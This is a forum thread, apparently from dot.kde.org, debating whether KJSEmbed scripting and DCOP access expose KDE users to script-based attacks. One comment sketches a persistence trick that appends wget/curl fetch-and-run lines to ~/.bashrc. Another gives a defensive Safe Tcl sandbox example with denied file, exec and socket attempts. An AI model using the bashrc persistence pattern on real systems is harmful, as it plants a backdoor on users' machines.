Just saw this too: http://www.kdedevelopers.org/node/view/427
Any chance for unstable kjsembed releases or even snapshots from cvs (that rely on kdelibs 3.2.x not kdelibs-cvs)?
This will work with KDE 3.2. It's a matter of getting a source snapshot of KDE bindings from head. We are currently debating a release in a few weeks to help people who wish to start using KJSEmbed now. In fact I really want a release so I can add this to www.kde-apps.org.
It needs latest CVS because I fixed a bug where QBoxLayouts didn't work. Stay tuned. Worst case Rich or I can make this available on our websites.
While I'm pretty confident about KDE developers, I wonder how close this mimics WSH and Windoze scripting, and if this could raise security concerns...
For example, I believe JS embedded in e-mails should be able to do stuff in the mail itself, but never be able to access mail client functionality (Addressbook access, harvesting addresses from other mails, sending mails, etc.), and of course shouldn't be able to access functionality from other parts of the system.
No, JS in emails should not be allowed (and I'm sure it won't be by the KMail developers). Sandboxing sounds nice in theory, but it's impossible to get perfect in practice. It's a humongous security hole waiting to happen and there's no good reason for it. Mouseovers in your HTML mail are not a good reason. If you want to send something that includes code, send it as an attachment and make people execute it manually. JS in webpages is bad enough, but at least you have to go and visit a site to execute the code, so you have some say in what does and doesn't get executed. If JS in emails got executed automatically, anybody could make people execute arbitrary JS code just by sending it to them in an email and waiting for them to view it. Any security hole in JS immediately becomes remotely exploitable on an arbitrary target system, with no user action required other than checking email.
to install spyware on your KDE box ?
For instance, having your spyware run every time you run KDE...
It's nice to see features but I see some problem
here if not done security wise.
What about root users running KDE viewing some website or email
and then getting infected without notice ?!
Infected like installing a SPAM server, installing rootkits, etc.
What about not working as root at all?
Come on, you don't need to be root to have spyware installed, what about rewriting bashrc, or something like that?
Get the idea?
How will rewriting a bashrc of a user allow to install a rootkit?
echo -e "
hex version of #!/bin/bash
if -e ~/run then
wget ... >>/dev/null
curl ... >>/dev/null
chmod 755 ~/run
" >> ~/.bashrc
Rootkits are to be run as non-root to gain root,
install crap in some cases, open ports, remove all traces,
make your box a slave...
Everyone calm down. The KHTML developers haven't lost their minds (any more than usual =) )
My goal was not to spread FUD or fear,
I just want to make sure that people are security conscious, period.
I admit, I haven't read the entire KDE CVS to look how it's implemented,
just read the article and few about it.
Perl or Python are executed from webpage on the server not locally (no risk),
Maybe with a KIO-Fuse or io-cmd slave...
Now, how you get KIO-Fuse from Konqueror, you probably can't...
However, someone else wasn't that cautious:
click me (not really!)
which is traditionally used by Konqueror."
Okay, now if it uses the same "interpreter"
how is that same "interpreter" isolated from DCOP?
Someone pointed into the "sandbox" feature, how does it work?
Is there any regular "testing" done upon every release to ensure
no security risks are present?
Mainly DCOP calls don't work in Konqueror/KHTML/KMail?
The best way is "education", show, describe, write webpages
describing why it's "impossible".
Bugs appear often when people discover them
and wouldn't be pleased no more than anyone else 2 years from now
when a bug would allow such... and people exploiting it!
For what its worth, I love KDE, I think it's a great environment,
but I think it's worth being a bit more cautious about what gets in.
In the case of KJSembed, JS is used as a regular local scripting language. All scripts have to be on disk, and are executed like any other script or program. KJSembed is a separate interpreter, having absolutely no connection to KHTML or KMail. It is used just like Bash, Python or Perl by setting a script's first line to "#!/usr/bin/kjsembed".
Of course, you can write a malicious script using KJSembed, just like you could write a Bash script doing "rm -rf ~/" or a C program doing the same.
Thanks for the clarification.
I know about your urge to promote fear of any platform that KDE supports, but please refrain from outright lies.
1) KJSEmbed scripts must be run off the local file system. Since you obviously have no clue how KDE operates I'll let you know that KMail attachments, Webpages etc. are not a local file system.
2) KRun (the thing that starts stuff up) cannot run scripts on click*. This is a bug, it will be able to run scripts in 3.3 that are marked executable by the file system. So again you lose, a script must be downloaded, and chmod +x to even run.
3) KDE doesn't introduce any new holes that UNIX has not had for the last 30 years in respects to shell scripts. We are just allowing GUI applications to be automated the way CLI apps have been for years.
So please in the future put your FUD somewhere more useful than KDE. We have no time for ignorant Chicken Littles who love to yell the sky is falling as loud as we can.
*This is not totally true but it's not worth explaining the details of that here, refer to the kde-core-devel list.
Its only similarity is that it is a script engine.... please research this stuff before posting or go back to slushdot.
This adds absolutely no more risk than say python, perl or even bash shell do to linux. How many python viruses do we have out there? Oh in the last 30 years how many shell viruses have we seen? Hmmm maybe 0 at last count? You might think if there were a way to spread a script virus on unix they would have found it in the last 30 years, right?
All in all while your FUD is amusing to me personally, it's not helping the spread of our platform. If you wish to give input please, I beg you to at least research and learn the architecture before spreading fear and doubt about the platform. I have been fighting these lame arguments with dcop for years, I would think people here like KDE enough to not spread FUD like this.
It's easy to understand why people might be concerned having only read the news item. Take this extract:
Alarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of "integration" Microsoft are well known for.
"This article covers how to use the DCOP API from KJSEmbed and sports a simple demo script that shows off how to use this API."
Now I know that people have to read your article to understand what's really going on here, and I haven't even read your article yet, but then I do know what KJSEmbed is about. The news item could be the first many people have heard/read about your work - I'd argue that a better first impression could dampen down some of that unnecessary criticism.
And by that logic is perfectly for me to walk into a crowded theater and without looking for any fire alarms I should yell as loud as possible "we could all die in a fire here because there are no fire alarms!"
Please, don't promote your own knee-jerk reactions. You not only look foolish, but you scare people who may have less of a clue about what is going on than you. This is truly a disservice to Open Source because you undermine the platform by spreading FUD that can propagate for years.
I don't follow your "logic" at all. Remember that news items like this one get syndicated widely, either via RDF/RSS or by page "mining". All it takes is for someone to see a badly presented/summarised piece of technology in a news feed and they're going to react exactly as people have in the earlier comments.
All I was doing was explaining the phenomenon, but if you want to throw your hands up in disbelief every time it happens, feel free to do so!
BTW, a more apt analogy is you meeting a group of strangers, introducing yourself with the phrase "I eat turtles" (when you do not and never have considered doing so) and then being surprised that you're subsequently known as "the turtle eater".
Well, it revolves around the central issue that you refuse to understand what you are talking about... that's all.
this isn't slashdot, we can read the articles before we respond.
>this isn't slashdot, we can read the articles before we respond.
This one made my day ;)
"Alarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of "integration" Microsoft are well known for."
I can understand well reasoned but ill-informed comments. This is just bollocks. Try and understand how Microsoft implements scripting first. It doesn't have to be that way, and it won't.
> How many python viruses do we have out there?
At least one ;)
At least 9 Perl viruses, 4 PHP viruses and 1 Python virus
without looking extensively... on Google!
Few more links on Shell Virus from Google:
You forgot the most common unix virus though.
I have to admit in the last 21 years on a computer I've seen more Amiga viruses than Unix ones =) The point I was attempting to make is how many viruses have you _seen_. I'd be hard pressed past trojans installed as parts of root kits that no-one has seen these in the wild.
Amusing none the less.
Scripting like this is no more of a risk, and will add great functionality. Please don't confuse this with Windoze scripting. Microsoft in their infinite wisdom decided to expose the whole of Windows to the outside world through scripting and ActiveX. That should not give scripting itself a bad name.
IMHO the largest problem with windows scripting is their lack of concept of the execute bit. Because of this they treat every file that is a script as an executable. So click on a web link with an exe it runs... click on an exe in an email, again it runs.... scary man.
KDE has a sane group of developers and Unix architecture makes it easier for us to do things right. We can make the scripts easy for users to use, but harder to shoot themselves in the feet with.
The only thing we have to fear from scripting integration in KDE is increased usability and more functionality that will make things like KDE prime time!
Tcl has a version that can be loaded into a browser so you can
embed tcl in your code for client-side execution. The Tcl guys thought
about this and made it so that the Tcl code does not allow any file system
access. In fact, there is a list of things that are turned off. The user must
turn on the things that will be tolerated. But the default is that the worst
the code could do is destroy its own window.
I would suggest looking at the Tcl 'safe interpreter' layout for useful pointers in this respect.
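The default-deny model described in the comment above, as an added example that is not part of the original thread: a safe Tcl interpreter rejects file, process and network commands until the host explicitly turns one capability on. The names `guest` and `host_log` and the sample scripts are hypothetical, constructed for this illustration.

```tcl
# Added example: Safe Tcl default-deny interpreter with one allow-listed capability.
# "guest" and "host_log" are hypothetical names chosen for this illustration.

# A safe interpreter starts with file, socket and process commands hidden.
set guest [interp create -safe]

# Constructed untrusted snippets, each trying something embedded code must not do,
# plus one harmless computation that should still work.
set attempts {
    {open ~/.bashrc a}
    {exec id}
    {socket example.invalid 25}
    {source /tmp/payload.tcl}
    {expr {6 * 7}}
}

foreach script $attempts {
    if {[catch {interp eval $guest $script} result]} {
        puts "DENIED  $script -> $result"
    } else {
        puts "ALLOWED $script -> $result"
    }
}

# Hidden commands still exist, but only the trusted host can invoke them.
puts "hidden in guest: [lsort [interp hidden $guest]]"

# Turn on exactly one capability: the guest command "log" runs host_log
# in the trusted interpreter, which validates its argument first.
proc host_log {msg} {
    if {[string length $msg] > 80} {
        error "log message too long"
    }
    puts "guest says: $msg"
}
interp alias $guest log {} host_log

interp eval $guest {log "hello from the sandbox"}
if {[catch {interp eval $guest {log [string repeat x 200]}} err]} {
    puts "DENIED  oversized log -> $err"
}

interp delete $guest
```

The alias is the only path from the untrusted interpreter into the host, so the review surface is the body of `host_log` rather than the whole command set.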
Yes, but Safe Tcl has been around for *ages*, whereas a lot of people only wised up to sandboxed execution well after Java came out.
On another subject related to undone homework, I'd like to refer you to RFC 1521 (http://www.ietf.org/rfc/rfc1521.txt) where a search for "security considerations" will provide some interesting insights. Section 7.4.2 is especially interesting in the light of recent vulnerabilities in various PostScript viewers (http://dot.kde.org/1049927346/).
Of course, the most interesting thing about RFC 1521 is the date. I guess that all those "sufficient research and implementations" were all in vain.
I would suggest maybe going out on a limb and researching before you speak, but hey I'm pragmatic, what can I say.
a) This is not in a browser.
b) We have the ability to "create a list of things to turn off"
This isn't rocket science people.